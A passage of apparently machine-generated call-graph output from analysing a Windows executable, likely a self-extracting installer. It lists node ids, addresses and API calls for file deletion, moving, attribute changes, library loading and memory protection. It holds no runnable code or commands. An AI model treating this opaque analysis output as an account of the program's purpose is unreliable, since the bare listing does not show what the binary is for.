23658->23891 23886 72974e 23659->23886 23662->23567 23663->23580 23665 72e627 23664->23665 23906 72e648 23665->23906 23668 7212f1 GetDlgItem ShowWindow 23668->23597 23670 73c749 __EH_prolog 23669->23670 23676 73bdcf 23670->23676 23929 73b314 23670->23929 23673 73b314 ExpandEnvironmentStringsW 23683 73c780 _wcslen _wcsrchr 23673->23683 23674 73ca67 SetWindowTextW 23674->23683 23676->23609 23680 73c855 SetFileAttributesW 23681 73c90f GetFileAttributesW 23680->23681 23693 73c86f __cftof _wcslen 23680->23693 23681->23683 23685 73c921 DeleteFileW 23681->23685 23683->23673 23683->23674 23683->23676 23683->23680 23686 73cc31 GetDlgItem SetWindowTextW SendMessageW 23683->23686 23690 73cc71 SendMessageW 23683->23690 23933 731fbb CompareStringW 23683->23933 23934 73a64d GetCurrentDirectoryW 23683->23934 23936 72a5d1 6 API calls 23683->23936 23937 72a55a FindClose 23683->23937 23938 73b48e 76 API calls 2 library calls 23683->23938 23939 743e3e 23683->23939 23685->23683 23687 73c932 23685->23687 23686->23683 23688 724092 _swprintf 51 API calls 23687->23688 23689 73c952 GetFileAttributesW 23688->23689 23689->23687 23691 73c967 MoveFileW 23689->23691 23690->23683 23691->23683 23692 73c97f MoveFileExW 23691->23692 23692->23683 23693->23681 23693->23683 23935 72b991 51 API calls 3 library calls 23693->23935 23695 73da5c __EH_prolog 23694->23695 23963 730659 23695->23963 23697 73da8d 23967 725b3d 23697->23967 23699 73daab 23971 727b0d 23699->23971 23703 73dafe 23987 727b9e 23703->23987 23705 73bdee 23705->23618 23707 73d6a8 23706->23707 24466 73a5c6 23707->24466 23710 73d6b5 GetWindow 23711 73bf15 23710->23711 23714 73d6d5 23710->23714 23711->23474 23711->23475 23712 73d6e2 GetClassNameW 24471 731fbb CompareStringW 23712->24471 23714->23711 23714->23712 23715 73d706 GetWindowLongW 23714->23715 23716 73d76a GetWindow 23714->23716 23715->23716 23717 73d716 SendMessageW 23715->23717 23716->23711 23716->23714 23717->23716 23718 73d72c GetObjectW 23717->23718 24472 73a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23718->24472 23720 73d743 24473 73a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23720->24473 24474 73a80c 8 API calls 23720->24474 23723 73d754 SendMessageW DeleteObject 23723->23716 23724->23490 23726 73abf1 23725->23726 23727 73abcc 23725->23727 23729 73abf6 SHAutoComplete 23726->23729 23730 73abff 23726->23730 24477 731fbb CompareStringW 23727->24477 23729->23730 23733 73b093 23730->23733 23731 73abdf 23731->23726 23732 73abe3 FindWindowExW 23731->23732 23732->23726 23734 73b09d __EH_prolog 23733->23734 23735 7213dc 84 API calls 23734->23735 23736 73b0bf 23735->23736 24478 721fdc 23736->24478 23739 73b0eb 23742 7219af 128 API calls 23739->23742 23740 73b0d9 23741 721692 86 API calls 23740->23741 23743 73b0e4 23741->23743 23745 73b10d __InternalCxxFrameHandler ___std_exception_copy 23742->23745 23743->23516 23743->23519 23744 721692 86 API calls 23744->23743 23745->23744 23746->23497 24486 73b568 PeekMessageW 23747->24486 23750 73d502 23756 73d50d ShowWindow SendMessageW SendMessageW 23750->23756 23751 73d536 SendMessageW SendMessageW 23752 73d572 23751->23752 23753 73d591 SendMessageW SendMessageW SendMessageW 23751->23753 23752->23753 23754 73d5e7 SendMessageW 23753->23754 23755 73d5c4 SendMessageW 23753->23755 23754->23514 23755->23754 23756->23751 23757->23576 23758->23603 23759->23608 23760->23612 23761->23616 23762->23625 23763->23557 23764->23577 23765->23550 23766->23538 23767->23633 23768->23631 23770 72a2bf 23769->23770 23771 72a2e3 23770->23771 23772 72a2d6 CreateDirectoryW 23770->23772 23790 72a231 23771->23790 23772->23771 23774 72a316 23772->23774 23776 72a325 23774->23776 23782 72a4ed 23774->23782 23776->23640 23777 72a329 GetLastError 23777->23776 23780 72a2ff 23780->23777 23781 72a303 CreateDirectoryW 23780->23781 23781->23774 23781->23777 23797 73ec50 23782->23797 23785 72a510 23787 72bb03 GetCurrentDirectoryW 23785->23787 23786 72a53d 23786->23776 23788 72a524 23787->23788 23788->23786 23789 72a528 SetFileAttributesW 23788->23789 23789->23786 23799 72a243 23790->23799 23793 72bb03 23794 72bb10 _wcslen 23793->23794 23795 72bbb8 GetCurrentDirectoryW 23794->23795 23796 72bb39 _wcslen 23794->23796 23795->23796 23796->23780 23798 72a4fa SetFileAttributesW 23797->23798 23798->23785 23798->23786 23800 73ec50 23799->23800 23801 72a250 GetFileAttributesW 23800->23801 23802 72a261 23801->23802 23803 72a23a 23801->23803 23804 72bb03 GetCurrentDirectoryW 23802->23804 23803->23777 23803->23793 23805 72a275 23804->23805 23805->23803 23806 72a279 GetFileAttributesW 23805->23806 23806->23803 23808 72407c __vswprintf_c_l 23807->23808 23811 745fd4 23808->23811 23814 744097 23811->23814 23815 7440d7 23814->23815 23816 7440bf 23814->23816 23815->23816 23818 7440df 23815->23818 23831 7491a8 20 API calls __dosmaperr 23816->23831 23833 744636 23818->23833 23819 7440c4 23832 749087 26 API calls ___std_exception_copy 23819->23832 23823 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23825 724086 23823->23825 23825->23568 23826 744167 23842 7449e6 51 API calls 3 library calls 23826->23842 23829 7440cf 23829->23823 23830 744172 23843 7446b9 20 API calls _free 23830->23843 23831->23819 23832->23829 23834 744653 23833->23834 23835 7440ef 23833->23835 23834->23835 23844 7497e5 GetLastError 23834->23844 23841 744601 20 API calls 2 library calls 23835->23841 23837 744674 23864 74993a 38 API calls __fassign 23837->23864 23839 74468d 23865 749967 38 API calls __fassign 23839->23865 23841->23826 23842->23830 23843->23829 23845 749801 23844->23845 23846 7497fb 23844->23846 23850 749850 SetLastError 23845->23850 23867 74b136 23845->23867 23866 74ae5b 11 API calls 2 library calls 23846->23866 23850->23837 23853 749830 23855 74981b 23853->23855 23856 749837 23853->23856 23854 749821 23858 74985c SetLastError 23854->23858 23874 748dcc 23855->23874 23881 749649 20 API calls _unexpected 23856->23881 23882 748d24 38 API calls _abort 23858->23882 23859 749842 23861 748dcc _free 20 API calls 23859->23861 23863 749849 23861->23863 23863->23850 23863->23858 23864->23839 23865->23835 23866->23845 23868 74b143 _unexpected 23867->23868 23869 74b183 23868->23869 23870 74b16e RtlAllocateHeap 23868->23870 23883 747a5e 7 API calls 2 library calls 23868->23883 23884 7491a8 20 API calls __dosmaperr 23869->23884 23870->23868 23872 749813 23870->23872 23872->23855 23880 74aeb1 11 API calls 2 library calls 23872->23880 23875 748e00 _free 23874->23875 23876 748dd7 RtlFreeHeap 23874->23876 23875->23854 23876->23875 23877 748dec 23876->23877 23885 7491a8 20 API calls __dosmaperr 23877->23885 23879 748df2 GetLastError 23879->23875 23880->23853 23881->23859 23883->23868 23884->23872 23885->23879 23887 729781 23886->23887 23890 729757 23886->23890 23887->23656 23890->23887 23897 72a1e0 23890->23897 23892 72964a 23891->23892 23893 72962c 23891->23893 23894 729669 23892->23894 23905 726bd5 76 API calls 23892->23905 23893->23892 23895 729638 FindCloseChangeNotification 23893->23895 23894->23656 23895->23892 23898 73ec50 23897->23898 23899 72a1ed DeleteFileW 23898->23899 23900 72a200 23899->23900 23901 72977f 23899->23901 23902 72bb03 GetCurrentDirectoryW 23900->23902 23901->23656 23903 72a214 23902->23903 23903->23901 23904 72a218 DeleteFileW 23903->23904 23904->23901 23905->23894 23912 72d9b0 23906->23912 23909 72e645 SetDlgItemTextW 23909->23668 23910 72e66b LoadStringW 23910->23909 23911 72e682 LoadStringW 23910->23911 23911->23909 23917 72d8ec 23912->23917 23914 72d9cd 23916 72d9e2 23914->23916 23925 72d9f0 26 API calls 23914->23925 23916->23909 23916->23910 23918 72d904 23917->23918 23924 72d984 _strncpy 23917->23924 23919 72d928 23918->23919 23926 731da7 WideCharToMultiByte 23918->23926 23921 72d959 23919->23921 23927 72e5b1 50 API calls __vsnprintf 23919->23927 23928 746159 26 API calls 3 library calls 23921->23928 23924->23914 23925->23916 23926->23919 23927->23921 23928->23924 23930 73b31e 23929->23930 23931 73b3f0 ExpandEnvironmentStringsW 23930->23931 23932 73b40d 23930->23932 23931->23932 23932->23683 23933->23683 23934->23683 23935->23693 23936->23683 23937->23683 23938->23683 23940 748e54 23939->23940 23941 748e61 23940->23941 23942 748e6c 23940->23942 23952 748e06 23941->23952 23944 748e74 23942->23944 23950 748e7d _unexpected 23942->23950 23945 748dcc _free 20 API calls 23944->23945 23948 748e69 23945->23948 23946 748ea7 HeapReAlloc 23946->23948 23946->23950 23947 748e82 23959 7491a8 20 API calls __dosmaperr 23947->23959 23948->23683 23950->23946 23950->23947 23960 747a5e 7 API calls 2 library calls 23950->23960 23953 748e44 23952->23953 23954 748e14 _unexpected 23952->23954 23962 7491a8 20 API calls __dosmaperr 23953->23962 23954->23953 23956 748e2f RtlAllocateHeap 23954->23956 23961 747a5e 7 API calls 2 library calls 23954->23961 23956->23954 23957 748e42 23956->23957 23957->23948 23959->23948 23960->23950 23961->23954 23962->23957 23964 730666 _wcslen 23963->23964 23991 7217e9 23964->23991 23966 73067e 23966->23697 23968 730659 _wcslen 23967->23968 23969 7217e9 78 API calls 23968->23969 23970 73067e 23969->23970 23970->23699 23972 727b17 __EH_prolog 23971->23972 24008 72ce40 23972->24008 23974 727b32 24014 73eb38 23974->24014 23976 727b5c 24023 734a76 23976->24023 23979 727c7d 23980 727c87 23979->23980 23982 727cf1 23980->23982 24055 72a56d 23980->24055 23985 727d50 23982->23985 24033 728284 23982->24033 23983 727d92 23983->23703 23985->23983 24061 72138b 74 API calls 23985->24061 23988 727bac 23987->23988 23990 727bb3 23987->23990 23989 732297 86 API calls 23988->23989 23989->23990 23992 7217ff 23991->23992 24003 72185a __InternalCxxFrameHandler 23991->24003 23993 721828 23992->23993 24004 726c36 76 API calls __vswprintf_c_l 23992->24004 23994 721887 23993->23994 23998 721847 ___std_exception_copy 23993->23998 23997 743e3e 22 API calls 23994->23997 23996 72181e 24005 726ca7 75 API calls 23996->24005 24000 72188e 23997->24000 23998->24003 24006 726ca7 75 API calls 23998->24006 24000->24003 24007 726ca7 75 API calls 24000->24007 24003->23966 24004->23996 24005->23993 24006->24003 24007->24003 24009 72ce4a __EH_prolog 24008->24009 24010 73eb38 8 API calls 24009->24010 24011 72ce8d 24010->24011 24012 73eb38 8 API calls 24011->24012 24013 72ceb1 24012->24013 24013->23974 24016 73eb3d ___std_exception_copy 24014->24016 24015 73eb57 24015->23976 24016->24015 24019 73eb59 24016->24019 24029 747a5e 7 API calls 2 library calls 24016->24029 24018 73f5c9 24031 74238d RaiseException 24018->24031 24019->24018 24030 74238d RaiseException 24019->24030 24022 73f5e6 24024 734a80 __EH_prolog 24023->24024 24025 73eb38 8 API calls 24024->24025 24026 734a9c 24025->24026 24027 727b8b 24026->24027 24032 730e46 80 API calls 24026->24032 24027->23979 24029->24016 24030->24018 24031->24022 24032->24027 24034 72828e __EH_prolog 24033->24034 24062 7213dc 24034->24062 24036 7282aa 24037 7282bb 24036->24037 24202 729f42 24036->24202 24040 7282f2 24037->24040 24070 721a04 24037->24070 24198 721692 24040->24198 24043 728389 24089 728430 24043->24089 24046 7283e8 24094 721f6d 24046->24094 24050 7282ee 24050->24040 24050->24043 24053 72a56d 7 API calls 24050->24053 24206 72c0c5 CompareStringW _wcslen 24050->24206 24051 7283f3 24051->24040 24098 723b2d 24051->24098 24110 72848e 24051->24110 24053->24050 24056 72a582 24055->24056 24057 72a5b0 24056->24057 24455 72a69b 24056->24455 24057->23980 24059 72a592 24059->24057 24060 72a597 FindClose 24059->24060 24060->24057 24061->23983 24063 7213e1 __EH_prolog 24062->24063 24064 72ce40 8 API calls 24063->24064 24065 721419 24064->24065 24066 73eb38 8 API calls 24065->24066 24069 721474 __cftof 24065->24069 24067 721461 24066->24067 24067->24069 24208 72b505 24067->24208 24069->24036 24071 721a0e __EH_prolog 24070->24071 24083 721a61 24071->24083 24086 721b9b 24071->24086 24224 7213ba 24071->24224 24074 721bc7 24227 72138b 74 API calls 24074->24227 24076 723b2d 101 API calls 24080 721c12 24076->24080 24077 721bd4 24077->24076 24077->24086 24078 721c5a 24082 721c8d 24078->24082 24078->24086 24228 72138b 74 API calls 24078->24228 24080->24078 24081 723b2d 101 API calls 24080->24081 24081->24080 24082->24086 24088 729e80 79 API calls 24082->24088 24083->24074 24083->24077 24083->24086 24084 723b2d 101 API calls 24085 721cde 24084->24085 24085->24084 24085->24086 24086->24050 24087 729e80 79 API calls 24087->24083 24088->24085 24246 72cf3d 24089->24246 24091 728440 24250 7313d2 GetSystemTime SystemTimeToFileTime 24091->24250 24093 7283a3 24093->24046 24207 731b66 72 API calls 24093->24207 24095 721f72 __EH_prolog 24094->24095 24097 721fa6 24095->24097 24251 7219af 24095->24251 24097->24051 24099 723b39 24098->24099 24100 723b3d 24098->24100 24099->24051 24109 729e80 79 API calls 24100->24109 24101 723b4f 24102 723b78 24101->24102 24103 723b6a 24101->24103 24382 72286b 101 API calls 3 library calls 24102->24382 24104 723baa 24103->24104 24381 7232f7 89 API calls 2 library calls 24103->24381 24104->24051 24107 723b76 24107->24104 24383 7220d7 74 API calls 24107->24383 24109->24101 24111 728498 __EH_prolog 24110->24111 24114 7284d5 24111->24114 24121 728513 24111->24121 24407 738c8d 103 API calls 24111->24407 24113 7284f5 24115 7284fa 24113->24115 24116 72851c 24113->24116 24114->24113 24118 72857a 24114->24118 24114->24121 24115->24121 24408 727a0d 152 API calls 24115->24408 24116->24121 24409 738c8d 103 API calls 24116->24409 24118->24121 24384 725d1a 24118->24384 24121->24051 24122 728605 24122->24121 24390 728167 24122->24390 24125 728797 24126 72a56d 7 API calls 24125->24126 24128 728802 24125->24128 24126->24128 24127 72d051 82 API calls 24135 72885d 24127->24135 24396 727c0d 24128->24396 24130 72898b 24412 722021 74 API calls 24130->24412 24131 728a5f 24136 728ab6 24131->24136 24149 728a6a 24131->24149 24132 728992 24132->24131 24137 7289e1 24132->24137 24135->24121 24135->24127 24135->24130 24135->24132 24410 728117 84 API calls 24135->24410 24411 722021 74 API calls 24135->24411 24144 728a4c 24136->24144 24415 727fc0 97 API calls 24136->24415 24141 72a231 3 API calls 24137->24141 24137->24144 24146 728b14 24137->24146 24138 729105 24143 72959a 80 API calls 24138->24143 24139 728ab4 24140 72959a 80 API calls 24139->24140 24140->24121 24145 728a19 24141->24145 24143->24121 24144->24139 24144->24146 24145->24144 24413 7292a3 97 API calls 24145->24413 24146->24138 24158 728b82 24146->24158 24416 7298bc 24146->24416 24147 72ab1a 8 API calls 24150 728bd1 24147->24150 24149->24139 24414 727db2 101 API calls 24149->24414 24153 72ab1a 8 API calls 24150->24153 24170 728be7 24153->24170 24156 728b70 24420 726e98 77 API calls 24156->24420 24158->24147 24159 728cbc 24160 728e40 24159->24160 24161 728d18 24159->24161 24164 728e52 24160->24164 24165 728e66 24160->24165 24184 728d49 24160->24184 24162 728d8a 24161->24162 24163 728d28 24161->24163 24172 728167 19 API calls 24162->24172 24167 728d6e 24163->24167 24175 728d37 24163->24175 24168 729215 123 API calls 24164->24168 24166 733377 75 API calls 24165->24166 24169 728e7f 24166->24169 24167->24184 24423 7277b8 111 API calls 24167->24423 24168->24184 24426 733020 123 API calls 24169->24426 24170->24159 24171 728c93 24170->24171 24178 72981a 79 API calls 24170->24178 24171->24159 24421 729a3c 82 API calls 24171->24421 24176 728dbd 24172->24176 24422 722021 74 API calls 24175->24422 24180 728de6 24176->24180 24181 728df5 24176->24181 24176->24184 24178->24171 24424 727542 85 API calls 24180->24424 24425 729155 93 API calls __EH_prolog 24181->24425 24187 728f85 24184->24187 24427 722021 74 API calls 24184->24427 24186 729090 24186->24138 24189 72a4ed 3 API calls 24186->24189 24187->24138 24187->24186 24188 72903e 24187->24188 24428 729f09 SetEndOfFile 24187->24428 24402 729da2 24188->24402 24190 7290eb 24189->24190 24190->24138 24429 722021 74 API calls 24190->24429 24193 729085 24195 729620 77 API calls 24193->24195 24195->24186 24196 7290fb 24430 726dcb 76 API calls _wcschr 24196->24430 24199 7216a4 24198->24199 24446 72cee1 24199->24446 24203 729f59 24202->24203 24205 729f63 24203->24205 24454 726d0c 78 API calls 24203->24454 24205->24037 24206->24050 24207->24046 24209 72b50f __EH_prolog 24208->24209 24214 72f1d0 82 API calls 24209->24214 24211 72b521 24215 72b61e 24211->24215 24214->24211 24216 72b630 __cftof 24215->24216 24219 7310dc 24216->24219 24222 73109e GetCurrentProcess GetProcessAffinityMask 24219->24222 24223 72b597 24222->24223 24223->24069 24229 721732 24224->24229 24226 7213d6 24226->24087 24227->24086 24228->24082 24230 721748 24229->24230 24241 7217a0 __InternalCxxFrameHandler 24229->24241 24231 721771 24230->24231 24242 726c36 76 API calls __vswprintf_c_l 24230->24242 24232 7217c7 24231->24232 24235 72178d ___std_exception_copy 24231->24235 24234 743e3e 22 API calls 24232->24234 24237 7217ce 24234->24237 24235->24241 24244 726ca7 75 API calls 24235->24244 24236 721767 24243 726ca7 75 API calls 24236->24243 24237->24241 24245 726ca7 75 API calls 24237->24245 24241->24226 24242->24236 24243->24231 24244->24241 24245->24241 24247 72cf4d 24246->24247 24249 72cf54 24246->24249 24248 72981a 79 API calls 24247->24248 24248->24249 24249->24091 24250->24093 24252 7219bb 24251->24252 24253 7219bf 24251->24253 24252->24097 24255 7218f6 24253->24255 24256 721908 24255->24256 24257 721945 24255->24257 24258 723b2d 101 API calls 24256->24258 24263 723fa3 24257->24263 24259 721928 24258->24259 24259->24252 24265 723fac 24263->24265 24264 723b2d 101 API calls 24264->24265 24265->24264 24267 721966 24265->24267 24280 730e08 24265->24280 24267->24259 24268 721e50 24267->24268 24269 721e5a __EH_prolog 24268->24269 24288 723bba 24269->24288 24271 721e84 24272 721732 78 API calls 24271->24272 24275 721f0b 24271->24275 24273 721e9b 24272->24273 24316 7218a9 78 API calls 24273->24316 24275->24259 24276 721eb3 24278 721ebf _wcslen 24276->24278 24317 731b84 MultiByteToWideChar 24276->24317 24318 7218a9 78 API calls 24278->24318 24281 730e0f 24280->24281 24282 730e2a 24281->24282 24286 726c31 RaiseException _com_raise_error 24281->24286 24284 730e3b SetThreadExecutionState 24282->24284 24287 726c31 RaiseException _com_raise_error 24282->24287 24284->24265 24286->24282 24287->24284 24289 723bc4 __EH_prolog 24288->24289 24290 723bf6 24289->24290 24291 723bda 24289->24291 24293 723e51 24290->24293 24296 723c22 24290->24296 24344 72138b 74 API calls 24291->24344 24361 72138b 74 API calls 24293->24361 24295 723be5 24295->24271 24296->24295 24319 733377 24296->24319 24298 723ca3 24299 723d2e 24298->24299 24315 723c9a 24298->24315 24347 72d051 24298->24347 24329 72ab1a 24299->24329 24300 723c9f 24300->24298 24346 7220bd 78 API calls 24300->24346 24302 723c71 24302->24298 24302->24300 24303 723c8f 24302->24303 24345 72138b 74 API calls 24303->24345 24307 723d41 24309 723dd7 24307->24309 24310 723dc7 24307->24310 24353 733020 123 API calls 24309->24353 24333 729215 24310->24333 24313 723dd5 24313->24315 24354 722021 74 API calls 24313->24354 24355 732297 24315->24355 24316->24276 24317->24278 24318->24275 24320 73338c 24319->24320 24323 733396 ___std_exception_copy 24319->24323 24362 726ca7 75 API calls 24320->24362 24322 7334c6 24364 74238d RaiseException 24322->24364 24323->24322 24324 73341c 24323->24324 24328 733440 __cftof 24323->24328 24363 7332aa 75 API calls 3 library calls 24324->24363 24327 7334f2 24328->24302 24330 72ab28 24329->24330 24332 72ab32 24329->24332 24331 73eb38 8 API calls 24330->24331 24331->24332 24332->24307 24334 72921f __EH_prolog 24333->24334 24365 727c64 24334->24365 24337 7213ba 78 API calls 24338 729231 24337->24338 24368 72d114 24338->24368 24340 729243 24341 72928a 24340->24341 24343 72d114 118 API calls 24340->24343 24377 72d300 97 API calls __InternalCxxFrameHandler 24340->24377 24341->24313 24343->24340 24344->24295 24345->24315 24346->24298 24348 72d072 24347->24348 24349 72d084 24347->24349 24378 72603a 82 API calls 24348->24378 24379 72603a 82 API calls 24349->24379 24352 72d07c 24352->24299 24353->24313 24354->24315 24356 7322a1 24355->24356 24357 7322ba 24356->24357 24360 7322ce 24356->24360 24380 730eed 86 API calls 24357->24380 24359 7322c1 24359->24360 24361->24295 24362->24323 24363->24328 24364->24327 24366 72b146 GetVersionExW 24365->24366 24367 727c69 24366->24367 24367->24337 24375 72d12a __InternalCxxFrameHandler 24368->24375 24369 72d29a 24370 72d2ce 24369->24370 24371 72d0cb 6 API calls 24369->24371 24372 730e08 SetThreadExecutionState RaiseException 24370->24372 24371->24370 24374 72d291 24372->24374 24373 738c8d 103 API calls 24373->24375 24374->24340 24375->24369 24375->24373 24375->24374 24376 72ac05 91 API calls 24375->24376 24376->24375 24377->24340 24378->24352 24379->24352 24380->24359 24381->24107 24382->24107 24383->24104 24385 725d2a 24384->24385 24431 725c4b 24385->24431 24387 725d95 24387->24122 24389 725d5d 24389->24387 24436 72b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24389->24436 24391 728186 24390->24391 24392 728232 24391->24392 24443 72be5e 19 API calls __InternalCxxFrameHandler 24391->24443 24442 731fac CharUpperW 24392->24442 24395 72823b 24395->24125 24397 727c22 24396->24397 24398 727c5a 24397->24398 24444 726e7a 74 API calls 24397->24444 24398->24135 24400 727c52 24445 72138b 74 API calls 24400->24445 24403 729db3 24402->24403 24406 729dc2 24402->24406 24404 729db9 FlushFileBuffers 24403->24404 24403->24406 24404->24406 24405 729e3f SetFileTime 24405->24193 24406->24405 24407->24114 24408->24121 24409->24121 24410->24135 24411->24135 24412->24132 24413->24144 24414->24139 24415->24144 24417 728b5a 24416->24417 24418 7298c5 GetFileType 24416->24418 24417->24158 24419 722021 74 API calls 24417->24419 24418->24417 24419->24156 24420->24158 24421->24159 24422->24184 24423->24184 24424->24184 24425->24184 24426->24184 24427->24187 24428->24188 24429->24196 24430->24138 24437 725b48 24431->24437 24433 725c6c 24433->24389 24435 725b48 2 API calls 24435->24433 24436->24389 24438 725b52 24437->24438 24440 725c3a 24438->24440 24441 72b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24438->24441 24440->24433 24440->24435 24441->24438 24442->24395 24443->24392 24444->24400 24445->24398 24447 72cef2 24446->24447 24452 72a99e 86 API calls 24447->24452 24449 72cf24 24453 72a99e 86 API calls 24449->24453 24451 72cf2f 24452->24449 24453->24451 24454->24205 24456 72a6a8 24455->24456 24457 72a6c1 FindFirstFileW 24456->24457 24458 72a727 FindNextFileW 24456->24458 24460 72a6d0 24457->24460 24463 72a709 24457->24463 24459 72a732 GetLastError 24458->24459 24458->24463 24459->24463 24461 72bb03 GetCurrentDirectoryW 24460->24461 24462 72a6e0 24461->24462 24464 72a6e4 FindFirstFileW 24462->24464 24465 72a6fe GetLastError 24462->24465 24463->24059 24464->24463 24464->24465 24465->24463 24475 73a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24466->24475 24468 73a5cd 24469 73a5d9 24468->24469 24476 73a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24468->24476 24469->23710 24469->23711 24471->23714 24472->23720 24473->23720 24474->23723 24475->24468 24476->24469 24477->23731 24479 729f42 78 API calls 24478->24479 24480 721fe8 24479->24480 24481 722005 24480->24481 24482 721a04 101 API calls 24480->24482 24481->23739 24481->23740 24483 721ff5 24482->24483 24483->24481 24485 72138b 74 API calls 24483->24485 24485->24481 24487 73b583 GetMessageW 24486->24487 24488 73b5bc GetDlgItem 24486->24488 24489 73b599 IsDialogMessageW 24487->24489 24490 73b5a8 TranslateMessage DispatchMessageW 24487->24490 24488->23750 24488->23751 24489->24488 24489->24490 24490->24488 24491 7213e1 84 API calls 2 library calls 25318 7394e0 GetClientRect 25347 7321e0 26 API calls std::bad_exception::bad_exception 25366 73f2e0 46 API calls __RTC_Initialize 24492 73eae7 24493 73eaf1 24492->24493 24496 73e85d 24493->24496 24522 73e5bb 24496->24522 24498 73e86d 24499 73e8ca 24498->24499 24508 73e8ee 24498->24508 24500 73e7fb DloadReleaseSectionWriteAccess 6 API calls 24499->24500 24501 73e8d5 RaiseException 24500->24501 24517 73eac3 24501->24517 24502 73e966 LoadLibraryExA 24503 73e9c7 24502->24503 24504 73e979 GetLastError 24502->24504 24507 73e9d2 FreeLibrary 24503->24507 24509 73e9d9 24503->24509 24510 73e9a2 24504->24510 24511 73e98c 24504->24511 24505 73ea37 GetProcAddress 24506 73ea95 24505->24506 24513 73ea47 GetLastError 24505->24513 24531 73e7fb 24506->24531 24507->24509 24508->24502 24508->24503 24508->24506 24508->24509 24509->24505 24509->24506 24512 73e7fb DloadReleaseSectionWriteAccess 6 API calls 24510->24512 24511->24503 24511->24510 24514 73e9ad RaiseException 24512->24514 24515 73ea5a 24513->24515 24514->24517 24515->24506 24518 73e7fb DloadReleaseSectionWriteAccess 6 API calls 24515->24518 24519 73ea7b RaiseException 24518->24519 24520 73e5bb ___delayLoadHelper2@8 6 API calls 24519->24520 24521 73ea92 24520->24521 24521->24506 24523 73e5c7 24522->24523 24524 73e5ed 24522->24524 24539 73e664 24523->24539 24524->24498 24526 73e5cc 24527 73e5e8 24526->24527 24542 73e78d 24526->24542 24547 73e5ee GetModuleHandleW GetProcAddress GetProcAddress 24527->24547 24530 73e836 24530->24498 24532 73e82f 24531->24532 24533 73e80d 24531->24533 24532->24517 24534 73e664 DloadReleaseSectionWriteAccess 3 API calls 24533->24534 24535 73e812 24534->24535 24536 73e82a 24535->24536 24537 73e78d DloadProtectSection 3 API calls 24535->24537 24550 73e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24536->24550 24537->24536 24548 73e5ee GetModuleHandleW GetProcAddress GetProcAddress 24539->24548 24541 73e669 24541->24526 24545 73e7a2 DloadProtectSection 24542->24545 24543 73e7a8 24543->24527 24544 73e7dd VirtualProtect 24544->24543 24545->24543 24545->24544 24549 73e6a3 VirtualQuery GetSystemInfo 24545->24549 24547->24530 24548->24541 24549->24544 24550->24532 25319 73f4e7 29 API calls _abort 25367 74bee0 GetCommandLineA GetCommandLineW 25348 72f1e8 FreeLibrary 25320 73f4d3 20 API calls 24558 73e1d1 14 API calls ___delayLoadHelper2@8 24560 73e2d7 24562 73e1db 24560->24562 24561 73e85d ___delayLoadHelper2@8 14 API calls 24561->24562 24562->24561 25386 74a3d0 21 API calls 2 library calls 25387 752bd0 VariantClear 24564 7210d5 24569 725abd 24564->24569 24570 725ac7 __EH_prolog 24569->24570 24571 72b505 84 API calls 24570->24571 24572 725ad3 24571->24572 24576 725cac GetCurrentProcess GetProcessAffinityMask 24572->24576 25369 740ada 51 API calls 2 library calls 24639 73dec2 24640 73decf 24639->24640 24641 72e617 53 API calls 24640->24641 24642 73dedc 24641->24642 24643 724092 _swprintf 51 API calls 24642->24643 24644 73def1 SetDlgItemTextW 24643->24644 24645 73b568 5 API calls 24644->24645 24646 73df0e 24645->24646 25350 73b5c0 100 API calls 25388 7377c0 118 API calls 25389 73ffc0 RaiseException _com_raise_error _com_error::_com_error 25370 7362ca 123 API calls __InternalCxxFrameHandler 24658 73f3b2 24659 73f3be __FrameHandler3::FrameUnwindToState 24658->24659 24690 73eed7 24659->24690 24661 73f3c5 24662 73f518 24661->24662 24665 73f3ef 24661->24665 24763 73f838 4 API calls 2 library calls 24662->24763 24664 73f51f 24756 747f58 24664->24756 24673 73f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24665->24673 24701 748aed 24665->24701 24672 73f40e 24675 73f48f 24673->24675 24759 747af4 38 API calls 2 library calls 24673->24759 24709 73f953 GetStartupInfoW __cftof 24675->24709 24677 73f495 24710 748a3e 51 API calls 24677->24710 24679 73f49d 24711 73df1e 24679->24711 24684 73f4b1 24684->24664 24685 73f4b5 24684->24685 24686 73f4be 24685->24686 24761 747efb 28 API calls _abort 24685->24761 24762 73f048 12 API calls ___scrt_uninitialize_crt 24686->24762 24689 73f4c6 24689->24672 24691 73eee0 24690->24691 24765 73f654 IsProcessorFeaturePresent 24691->24765 24693 73eeec 24766 742a5e 24693->24766 24695 73eef1 24700 73eef5 24695->24700 24774 748977 24695->24774 24698 73ef0c 24698->24661 24700->24661 24702 748b04 24701->24702 24703 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24702->24703 24704 73f408 24703->24704 24704->24672 24705 748a91 24704->24705 24707 748ac0 24705->24707 24706 73fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24708 748ae9 24706->24708 24707->24706 24708->24673 24709->24677 24710->24679 24867 730863 24711->24867 24715 73df3d 24916 73ac16 24715->24916 24717 73df46 __cftof 24718 73df59 GetCommandLineW 24717->24718 24719 73dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24718->24719 24720 73df68 24718->24720 24721 724092 _swprintf 51 API calls 24719->24721 24920 73c5c4 24720->24920 24723 73e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24721->24723 24931 73b6dd LoadBitmapW 24723->24931 24726 73dfe0 24925 73dbde 24726->24925 24727 73df76 OpenFileMappingW 24729 73dfd6 CloseHandle 24727->24729 24730 73df8f MapViewOfFile 24727->24730 24729->24719 24733 73dfa0 __InternalCxxFrameHandler 24730->24733 24734 73dfcd UnmapViewOfFile 24730->24734 24738 73dbde 2 API calls 24733->24738 24734->24729 24740 73dfbc 24738->24740 24739 7390b7 8 API calls 24741 73e0aa DialogBoxParamW 24739->24741 24740->24734 24742 73e0e4 24741->24742 24743 73e0f6 Sleep 24742->24743 24744 73e0fd 24742->24744 24743->24744 24747 73e10b 24744->24747 24961 73ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 